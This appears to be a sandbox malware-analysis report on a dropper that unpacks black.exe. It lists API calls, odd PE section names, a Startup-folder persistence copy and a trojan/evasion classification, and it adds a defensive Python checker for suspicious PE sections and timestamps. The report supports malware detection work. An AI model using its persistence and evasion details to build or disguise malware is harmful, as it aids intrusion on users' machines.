Source: black.exe.1.dr | Static PE information: section name: .z~z
Source: black.exe.1.dr | Static PE information: section name: .%?T
Source: black.exe0.1.dr | Static PE information: section name: .|]Y
Source: black.exe0.1.dr | Static PE information: section name: .z~z
Source: black.exe0.1.dr | Static PE information: section name: .%?T
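The three section names listed for the dropped black.exe (.|]Y, .z~z, .%?T) are what the "PE file contains section with special chars" and "sections with non-standard names" signatures key on. As an added example, not code from Joe Sandbox, here is a small parser that walks the PE section table and applies those two checks, plus the COFF TimeDateStamp sanity check behind the "Binary contains a suspicious time stamp" signature. The PE image it runs on is constructed in memory from those section names; the set of "standard" names and the allowed-character class are assumptions for illustration, not a published list.

```python
import re
import struct
import time

# Section names common MSVC / MinGW / .NET toolchains emit (assumed list); anything else gets a look.
STANDARD_SECTIONS = {
    ".text", ".rdata", ".data", ".pdata", ".idata", ".edata", ".rsrc", ".reloc",
    ".bss", ".tls", ".CRT", ".gfids", ".00cfg", ".xdata", ".didat", ".sxdata",
}
# Characters linkers actually use in section names (assumed); packers often fall outside this.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.$]+$")


def build_minimal_pe(section_names, timestamp):
    """Constructed fixture: a header-only PE32+ image with the given section names and COFF timestamp."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + bytes(e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)                 # e_lfanew -> PE signature
    size_of_optional = 0xF0                                      # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), timestamp, 0, 0, size_of_optional, 0x22)
    optional = struct.pack("<H", 0x20B) + bytes(size_of_optional - 2)   # magic PE32+, rest zeroed
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), 0, 0, 0, 0, 0, 0, 0, 0, 0x60000020)
        for name in section_names
    )
    return bytes(dos) + b"PE\0\0" + coff + optional + sections


def coff_header(data):
    """Locate the COFF header; returns (e_lfanew, number_of_sections, timestamp, size_of_optional)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, n_sections, timestamp, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    return e_lfanew, n_sections, timestamp, size_opt


def section_names(data):
    """Raw 8-byte names from the section table, NUL-trimmed and decoded byte-for-byte."""
    e_lfanew, n_sections, _, size_opt = coff_header(data)
    table = e_lfanew + 24 + size_opt                              # sig(4) + COFF(20) + optional
    names = []
    for i in range(n_sections):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:
            raise ValueError("section table truncated")
        names.append(raw.split(b"\0", 1)[0].decode("latin-1"))
    return names


def classify_sections(names):
    """Split into (non-standard names, names containing characters no normal toolchain emits)."""
    non_standard = [n for n in names if n not in STANDARD_SECTIONS]
    special_chars = [n for n in names if not SAFE_NAME_RE.match(n)]
    return non_standard, special_chars


def suspicious_timestamp(data, now=None):
    """A COFF TimeDateStamp of 0 or one later than `now` is a common packer / tampering tell."""
    now = int(time.time()) if now is None else now
    ts = coff_header(data)[2]
    return ts == 0 or ts > now


# Constructed fixture: the three section names the report lists for black.exe, two ordinary
# ones, and a zeroed build timestamp.
SAMPLE_PE = build_minimal_pe([b".text", b".rdata", b".|]Y", b".z~z", b".%?T"], timestamp=0)

if __name__ == "__main__":
    names = section_names(SAMPLE_PE)
    non_standard, special = classify_sections(names)
    print("sections:", names)
    print("non-standard:", non_standard, "| special chars:", special)
    print("suspicious timestamp:", suspicious_timestamp(SAMPLE_PE))
```

Odd section names alone do not prove packing, but combined with the entry point outside standard sections and the high-entropy flags the report lists for this sample, they are enough to route the file to unpacking before any static signature work.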
Source: C:\Users\user\AppData\Roaming\black.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC270 NtCreateSection
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB660 NtClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC660 NtQueryVolumeInformationFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB750 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC3B8 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC788 NtDeviceIoControlFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB420 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023ABC80 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC4D0 NtMapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC138 NtOpenFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB548 NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC268 NtCreateSection
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB658 NtClose
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC659 NtQueryVolumeInformationFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB74A NtProtectVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC3B0 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC780 NtDeviceIoControlFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB418 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023ABC79 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC4C8 NtMapViewOfSection
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AC130 NtOpenFile
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023AB546 NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023D6D68 NtSetInformationProcess
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023D7290 NtSetInformationProcess
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023D7309 NtSetInformationProcess
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BABC80 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC4D0 NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB420 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC138 NtOpenFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB548 NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC270 NtCreateSection
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB660 NtClose
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC660 NtQueryVolumeInformationFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC3B8 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC788 NtDeviceIoControlFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB750 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC4C8 NtMapViewOfSection
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB418 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BABC79 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC130 NtOpenFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB540 NtSetInformationThread
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC268 NtCreateSection
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB658 NtClose
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC659 NtQueryVolumeInformationFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC3B0 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAC780 NtDeviceIoControlFile
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 7_2_04BAB749 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9CC2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File created: C:\Windows\SysWOW64\jz2envuw.2rt.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File deleted: C:\Windows\SysWOW64\jz2envuw.2rt.exe
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9C5E24
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E1F20
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9ECE88
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DA4AC
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E3484
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9CF930
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D4928
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F8C1C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D5B60
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E4B98
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DBB90
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E3964
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DC96C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F89A0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA05AF8
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D1A48
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9C1AA4
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E2AB0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9FFA94
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA02080
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E8DF4
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E2D58
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DAF18
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E53F0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DB534
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E21D0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DF180
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9CC2F0
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9CA310
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D126C
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9C7288
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9C4840
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9FC838
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA02550
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9C76C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDADD8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDA188
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDBD00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDC6E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDA6A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDAA50
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDEA00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDE628
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDB7D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDD3A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CD6301
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDBB20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDE098
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDADC8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDC5E8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDA178
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDA698
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_00CDE618
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023A1B18
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023A1310
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 1_2_023ACBA8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A53A01_2_023A53A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A0F981_2_023A0F98
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7BC01_2_023A7BC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A58301_2_023A5830
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A74201_2_023A7420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AA4081_2_023AA408
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AD0501_2_023AD050
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A08501_2_023A0850
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A704A1_2_023A704A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A78B01_2_023A78B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A65001_2_023A6500
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A1D701_2_023A1D70
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AD5B01_2_023AD5B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A21F01_2_023A21F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A86881_2_023A8688
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE3081_2_023AE308
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7F011_2_023A7F01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A8F781_2_023A8F78
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023ACB981_2_023ACB98
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AA3F91_2_023AA3F9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A7BD01_2_023A7BD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A083F1_2_023A083F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A74301_2_023A7430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AAC311_2_023AAC31
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A98101_2_023A9810
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A70581_2_023A7058
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE0501_2_023AE050
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A9CA01_2_023A9CA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023AE8E21_2_023AE8E2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023A21E01_2_023A21E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D34C81_2_023D34C8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D01D01_2_023D01D0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D01C31_2_023D01C3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D44301_2_023D4430
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D44401_2_023D4440
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D8C381_2_023D8C38
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D8C481_2_023D8C48
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D53181_2_023D5318
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D51881_2_023D5188
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D36B01_2_023D36B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D36A01_2_023D36A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D77291_2_023D7729
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exeCode function: 1_2_023D1FB01_2_023D1FB0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253AA507_2_0253AA50
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253EA007_2_0253EA00
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253BB207_2_0253BB20
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A1887_2_0253A188
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_025311B87_2_025311B8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E6287_2_0253E628
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253C6E07_2_0253C6E0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A6A87_2_0253A6A8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253B7D07_2_0253B7D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253BD007_2_0253BD00
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253ADD87_2_0253ADD8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E0987_2_0253E098
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A1787_2_0253A178
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_025311A87_2_025311A8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253E6187_2_0253E618
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253A6987_2_0253A698
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253ADC87_2_0253ADC8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_0253C5E87_2_0253C5E8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA58307_2_04BA5830
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA74207_2_04BA7420
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAA4087_2_04BAA408
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD0507_2_04BAD050
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA08507_2_04BA0850
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA704A7_2_04BA704A
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD5B07_2_04BAD5B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA21F07_2_04BA21F0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA65007_2_04BA6500
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA1D707_2_04BA1D70
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BACBA87_2_04BACBA8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA53A07_2_04BA53A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA0F987_2_04BA0F98
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7BC07_2_04BA7BC0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA1B187_2_04BA1B18
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA13107_2_04BA1310
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA78B07_2_04BA78B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA9CA07_2_04BA9CA0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE8E27_2_04BAE8E2
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA083F7_2_04BA083F
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA74307_2_04BA7430
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAAC317_2_04BAAC31
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA58207_2_04BA5820
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA98107_2_04BA9810
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA70587_2_04BA7058
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE0507_2_04BAE050
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAD5A17_2_04BAD5A1
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA21E07_2_04BA21E0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA86887_2_04BA8688
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BACB987_2_04BACB98
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA53927_2_04BA5392
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAA3F97_2_04BAA3F9
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7BD07_2_04BA7BD0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BAE3087_2_04BAE308
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA7F017_2_04BA7F01
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BA8F787_2_04BA8F78
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD34C87_2_04BD34C8
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD44307_2_04BD4430
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD44407_2_04BD4440
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD01D07_2_04BD01D0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD01C07_2_04BD01C0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD36B07_2_04BD36B0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD36A07_2_04BD36A0
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD51887_2_04BD5188
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD71E17_2_04BD71E1
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD53187_2_04BD5318
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD7E887_2_04BD7E88
Source: C:\Users\user\AppData\Roaming\black.exeCode function: 7_2_04BD1FB07_2_04BD1FB0
Source: Y5kEUsYDFr.exe, 00000000.00000003.1668931650.0000017ACD921000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametaskill.exe0 vs Y5kEUsYDFr.exe
Source: classification engine | Classification label: mal100.troj.adwa.evad.winEXE@42/41@3/3
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9CB6D8 GetLastError,FormatMessageW,LocalFree
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E8624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Users\user\AppData\Roaming\black.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
Source: Y5kEUsYDFr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Y5kEUsYDFr.exe | ReversingLabs: Detection: 47%
Source: Y5kEUsYDFr.exe | Virustotal: Detection: 60%
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | File read: C:\Users\user\Desktop\Y5kEUsYDFr.exe
Source: unknown | Process created: C:\Users\user\Desktop\Y5kEUsYDFr.exe "C:\Users\user\Desktop\Y5kEUsYDFr.exe"
